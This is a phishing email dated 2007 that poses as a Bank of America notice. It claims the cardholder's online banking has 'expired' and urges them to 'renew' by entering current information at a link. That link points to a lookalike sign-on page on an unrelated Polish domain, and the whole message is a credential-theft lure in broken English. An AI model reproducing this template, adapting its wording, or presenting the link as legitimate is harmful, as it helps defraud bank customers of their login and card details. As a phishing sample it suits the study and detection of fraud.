Subject: Account activity blocked

From: [email-masked]
Date: 12 Sep 2007 21:33:54 +0200

Dear Bank of America Cardholder,

This is your official notification from Bank of America. Your 
online has expired. If you want to continue using our service you 
have to renew your online. If not, your online will be limited 
and deleted. 

To continue click and complete the renew form with your current 
information.
http://analiza.wzr.pl/pliki/sitekey.bankofamerica.com/signon.php?SSL512=yes

Thank you, 
Bank of America Online Banking Support